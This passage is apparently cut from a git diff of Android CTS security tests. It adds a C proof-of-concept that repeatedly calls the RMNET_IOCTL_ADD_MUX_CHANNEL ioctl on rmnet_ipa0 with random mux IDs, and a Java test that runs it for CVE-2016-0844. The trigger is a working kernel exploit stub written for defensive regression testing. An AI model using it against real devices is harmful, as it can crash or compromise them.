&extendata; + extendata.extended_ioctl = RMNET_IOCTL_ADD_MUX_CHANNEL; + for (i = 0; i < 3; i++) { + extendata.u.rmnet_mux_val.mux_id = rand(); + printf("[-] call ioctl %d\n", i); + if (ioctl(sfd, cmd, &ifr) < 0) { + printf("%s, %s\n", __func__, strerror(errno)); + ret = -1; + } + } + + return ret; +} + +int main() { + int sockfd; + char *ifname = "rmnet_ipa0"; + + srand(time(NULL)); + + if ((sockfd = socket(AF_INET, SOCK_DGRAM, 0)) < 0) { + printf("socket = %d, %s\n", sockfd, strerror(errno)); + exit(1); + } + + trigger(sockfd, ifname); + return 0; +} diff --git a/hostsidetests/security/src/android/security/cts/Poc16_04.java b/hostsidetests/security/src/android/security/cts/Poc16_04.java index 5d033751c0a..d3da9357393 100644 --- a/hostsidetests/security/src/android/security/cts/Poc16_04.java +++ b/hostsidetests/security/src/android/security/cts/Poc16_04.java @@ -30,4 +30,12 @@ public class Poc16_04 extends SecurityTestCase { String logcat = AdbUtils.runCommandLine("logcat -d", getDevice()); assertNotMatches("[\\s\\n\\S]*IOMX_InfoLeak b26323455[\\s\\n\\S]*", logcat); } + + /** + * b/26324307 + */ + @SecurityTest + public void testPocCVE_2016_0844() throws Exception { + AdbUtils.runPoc("CVE-2016-0844", getDevice(), 60); + } } |